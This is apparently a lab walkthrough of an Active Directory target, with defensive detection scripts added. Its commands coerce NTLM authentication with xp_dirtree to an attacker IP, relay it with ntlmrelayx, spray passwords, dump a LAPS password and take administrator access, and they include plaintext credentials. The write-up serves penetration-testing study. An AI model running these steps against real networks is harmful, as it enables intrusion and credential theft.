# Reflection

Enumerating the SMB shares of machine #3, we find creds:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3d19190de1fea70e06489fb385a7e8a017313a8d%2Fdbeac13fcd1fe31943a9ea19ba965951.png?alt=media)

Using these creds to log in to MSSQL on machine #3, we get other creds:

```
mssqlclient.py web_staging:'Washroom510'@10.10.143.69
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-47b3de2ff9eea249505f8e35cf4c027bd91503f4%2Fcf755f5d910fbdadd987c03d781f0e7a.png?alt=media)

Now, password spraying, we find other accounts with the same password:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b2a15a608ddca3ed9d36537b87464d624a707b2a%2F0d9438268311add55604fcce9e53df54.png?alt=media)

Now, doing an NTLM relay attack, we get a hash for an account:

```
exec xp_dirtree "\\10.8.1.208\share"
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b892df89fc805df9aa8e10068bb0a0f5c07e2da1%2Fabb91feba1b4fb6d581cc3dc1d97f1c2.png?alt=media)
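The `xp_dirtree` call above makes the SQL Server service authenticate over SMB to whichever host the UNC path names. As an added example (not part of the original walkthrough), this sketch flags such calls in audited SQL statements; the audit records, the trusted subnet and the file-server name are constructed assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Extended procedures that open a path; a UNC path makes the SQL Server
# service account authenticate over SMB to the named host.
PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")
UNC_CALL = re.compile(
    r"\b(" + "|".join(PROCS) + r")\b[^;]*?\\\\([^\\\s'\"]+)\\", re.IGNORECASE
)

# Assumptions: destinations SQL Server may legitimately reach over SMB.
TRUSTED_NETS = [ip_network("10.10.143.0/24")]
TRUSTED_NAMES = {"fs01.corp.example"}


def is_trusted(host):
    try:
        addr = ip_address(host)
    except ValueError:  # not an IP literal, compare as a host name
        return host.lower() in TRUSTED_NAMES
    return any(addr in net for net in TRUSTED_NETS)


def find_unc_coercion(records):
    """Return (login, procedure, host) for UNC calls to untrusted hosts."""
    findings = []
    for login, statement in records:
        for proc, host in UNC_CALL.findall(statement):
            if not is_trusted(host):
                findings.append((login, proc.lower(), host))
    return findings


# Constructed audit records: (login, statement text).
AUDIT = [
    ("web_staging", r'exec xp_dirtree "\\10.8.1.208\share"'),
    ("backup_svc", r"EXEC master..xp_dirtree '\\10.10.143.70\backups', 1, 1"),
    ("app_ro", "SELECT name FROM sys.databases"),
    ("web_staging", r"exec master.dbo.XP_FILEEXIST '\\fs01.corp.example\drop\a.txt'"),
    ("web_staging", r"exec xp_dirtree 'C:\inetpub'"),
]

if __name__ == "__main__":
    for finding in find_unc_coercion(AUDIT):
        print("untrusted UNC destination:", finding)
```

Blocking outbound SMB from database servers at the firewall removes the same exposure at the network layer.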

Now checking if message signing is disabled:

```
nxc smb 10.10.143.69-71 --gen-relay-list relay.txt
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-e16d39ff2a73bf80ae44df8ca21f1ee8c005dbeb%2F2ed881e74f10e1daf811394954d5ff26.png?alt=media)

It is false.

So, starting an NTLM relay:

```
ntlmrelayx.py -tf targets.txt -socks -smb2support
```

Now we can access shares:

```
proxychains smbclient \\\\10.10.197.101\\prod -U REFLECTION/SVC_WEB_STAGING
```

Now get new creds: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-29e040aa1e05e8e6b5a4a4591e3e1ac3af236bab%2F0ddd93e15a60baa6e930a017e12c79ce.png?alt=media)

Now we can check with MSSQL on the DC:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3eef108b87ca009db1fb5f7e75d1ce52f02069f5%2F9ebefc43d402d5d1fce9b6cdb7f9e9f0.png?alt=media)

We get passwords from the prod database on the DC.

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0ae48263c326ac6f1caa1cd7dadd100fb7b07733%2F8ed3404b3a9796f6e9d3fd4f7359ef5d.png?alt=media)

Now trying Responder:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-cc68488ad912a5e274ade4dcac9e3ca694f4d5a1%2F4697bfdee9d0e3b48f7bf368b19a8c1b.png?alt=media)

We get another user. We can't use NTLM relaying, as it doesn't work.

Now password spraying all passwords we have with the users:

```
nxc smb 10.10.197.101-103 -u users.list -p pass.txt --continue-on-success
```

Now we can use bloodhound: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-882ca9c04a6c8b73d5ce6a35d511dc3ce28319f5%2Fa84d11fc0d9467d12d5e6944297caaf7.png?alt=media)

But checking MachineAccountQuota: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-4304c570438d0c4d18c5f3ffa5bb44b2df5d967a%2F892c9e4771584bd6f7673f0ad1f8159d.png?alt=media)

Now we can try to get the LAPS password:

```
nxc ldap reflection.vl -u abbie.smith -p CMe1x+nlRaaWEw -M laps
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7627b69f1360a9b1b7213b633af9b654aeafaff5%2Fc96c8c5a00cd8df7852ffb99e2b24904.png?alt=media)

With this password we can try to password spray:

```
nxc smb 10.10.197.101-103 -u users.list -p "H447.++h6g5}xi" --local-auth --continue-on-success
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-06b0326b85aec93af46bee1f01a021430f8a6366%2F1f82a9479f91fa5cf535391204d14400.png?alt=media)

We got the administrator on ms01.
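The spraying steps in this walkthrough (one password tried against many accounts, with domain and with local authentication) leave a recognisable pattern in logon events: one source, many distinct accounts, few attempts each. As an added example (not part of the original walkthrough), this sketch finds that pattern in logon records such as Windows Security events 4625 and 4624; the events, addresses, account names and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """events: (iso_timestamp, source_ip, account, succeeded) tuples.

    Alert on a source that fails against at least min_accounts distinct
    accounts inside one sliding window, and list the accounts that source
    logged on to successfully (candidates for a password reset).
    """
    by_src = defaultdict(list)
    for ts, src, account, ok in events:
        by_src[src].append((datetime.fromisoformat(ts), account.lower(), ok))
    alerts = {}
    for src, rows in by_src.items():
        rows.sort()
        start, worst = 0, set()
        for end, (ts, _, _) in enumerate(rows):
            while ts - rows[start][0] > window:  # slide the window forward
                start += 1
            failed = {a for _, a, ok in rows[start:end + 1] if not ok}
            if len(failed) > len(worst):
                worst = failed
        if len(worst) >= min_accounts:
            alerts[src] = {
                "failed_accounts": sorted(worst),
                "succeeded": sorted({a for _, a, ok in rows if ok}),
            }
    return alerts


# Constructed events: a spray, a user mistyping a password, slow unrelated noise.
EVENTS = [
    ("2024-05-01T09:00:01", "192.0.2.10", "alice", False),
    ("2024-05-01T09:00:02", "192.0.2.10", "bob", False),
    ("2024-05-01T09:00:03", "192.0.2.10", "carol", True),
    ("2024-05-01T09:00:04", "192.0.2.10", "dave", False),
    ("2024-05-01T09:00:05", "192.0.2.10", "erin", False),
    ("2024-05-01T09:02:00", "192.0.2.20", "frank", False),
    ("2024-05-01T09:02:10", "192.0.2.20", "frank", False),
    ("2024-05-01T09:02:30", "192.0.2.20", "frank", True),
    ("2024-05-01T08:00:00", "192.0.2.30", "alice", False),
    ("2024-05-01T10:00:00", "192.0.2.30", "bob", False),
    ("2024-05-01T12:00:00", "192.0.2.30", "dave", False),
    ("2024-05-01T14:00:00", "192.0.2.30", "erin", False),
]

if __name__ == "__main__":
    print(detect_spray(EVENTS))
```

Per-account lockout counters do not see this pattern, because each account only receives one or two failures; grouping by source is what exposes it.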


